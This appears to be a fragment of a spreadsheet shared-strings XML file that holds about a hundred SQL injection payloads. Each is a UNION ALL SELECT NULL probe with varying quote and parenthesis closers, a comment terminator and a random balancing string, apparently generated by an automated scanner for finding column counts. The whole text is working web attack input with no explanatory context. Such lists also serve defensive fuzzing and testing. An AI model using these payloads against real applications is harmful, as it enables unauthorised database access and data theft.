    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Enia' = 'Enia</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'areM' = 'areM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'RPoM' = 'RPoM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'xmcU' = 'xmcU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Azyv' = 'Azyv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'HFBb' = 'HFBb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'riMX' = 'riMX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Pvff' = 'Pvff</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'IbBP' = 'IbBP</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'FdQv' = 'FdQv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'gQyH' = 'gQyH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'DUzM' = 'DUzM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'spOb' = 'spOb</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'CmnU' = 'CmnU</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'iIoE' = 'iIoE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'cYVD' = 'cYVD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'HAhW' = 'HAhW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'nJSu' = 'nJSu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'yLvH' = 'yLvH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'RIcF' = 'RIcF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'snaA' = 'snaA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'tkYH' LIKE 'tkYH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'zkKJ' LIKE 'zkKJ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'aIKH' LIKE 'aIKH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sIRS' LIKE 'sIRS</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rEuY' LIKE 'rEuY</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'txXs' LIKE 'txXs</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Xnpv' LIKE 'Xnpv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'vedI' LIKE 'vedI</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'GZRk' LIKE 'GZRk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'FlHu' LIKE 'FlHu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vfKm' LIKE 'vfKm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'SaBK' LIKE 'SaBK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'sRbe' LIKE 'sRbe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'svAz' LIKE 'svAz</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'nvpf' LIKE 'nvpf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'uTAA' LIKE 'uTAA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'OgoT' LIKE 'OgoT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'MFBF' LIKE 'MFBF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'beAe' LIKE 'beAe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hIqo' LIKE 'hIqo</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'gIOU' LIKE 'gIOU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'NsAf' LIKE 'NsAf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wCkQ' LIKE 'wCkQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'fifh' LIKE 'fifh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'oXlx' LIKE 'oXlx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'cULu' LIKE 'cULu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ZApH' LIKE 'ZApH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'OHEt' LIKE 'OHEt</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wbhE' LIKE 'wbhE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'BPjO' LIKE 'BPjO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'baHp' LIKE 'baHp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'MIqC' LIKE 'MIqC</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ytju' LIKE 'ytju</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'fgCe' LIKE 'fgCe</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Hthm' LIKE 'Hthm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'KOyE' LIKE 'KOyE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'aODg' LIKE 'aODg</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'BcyH' LIKE 'BcyH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'TJSP' LIKE 'TJSP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Ujrq' LIKE 'Ujrq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "VJHH" = "VJHH</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "aRvh" = "aRvh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "uCZh" = "uCZh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "SLyI" = "SLyI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "vAht" = "vAht</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "DqxY" = "DqxY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "eJAb" = "eJAb</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "dsUr" = "dsUr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "CWRW" = "CWRW</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "wmbT" = "wmbT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "TEKw" = "TEKw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "XTws" = "XTws</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "bPQp" = "bPQp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "jSeS" = "jSeS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "xmXb" = "xmXb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "XYFL" = "XYFL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "BCpR" = "BCpR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "UnIh" = "UnIh</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "orAL" = "orAL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "DxrG" = "DxrG</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "GJyX" = "GJyX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "IhsF" = "IhsF</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "LQTX" = "LQTX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "cgNd" = "cgNd</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "gkJe" = "gkJe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ryna" = "ryna</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "sVMR" = "sVMR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "qeVJ" = "qeVJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "FlWS" = "FlWS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "DSvX" = "DSvX</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "AkpV" = "AkpV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "snAa" = "snAa</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "uCnA" = "uCnA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "oRiu" = "oRiu</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "JrXO" = "JrXO</t>
  </si>
  <si>
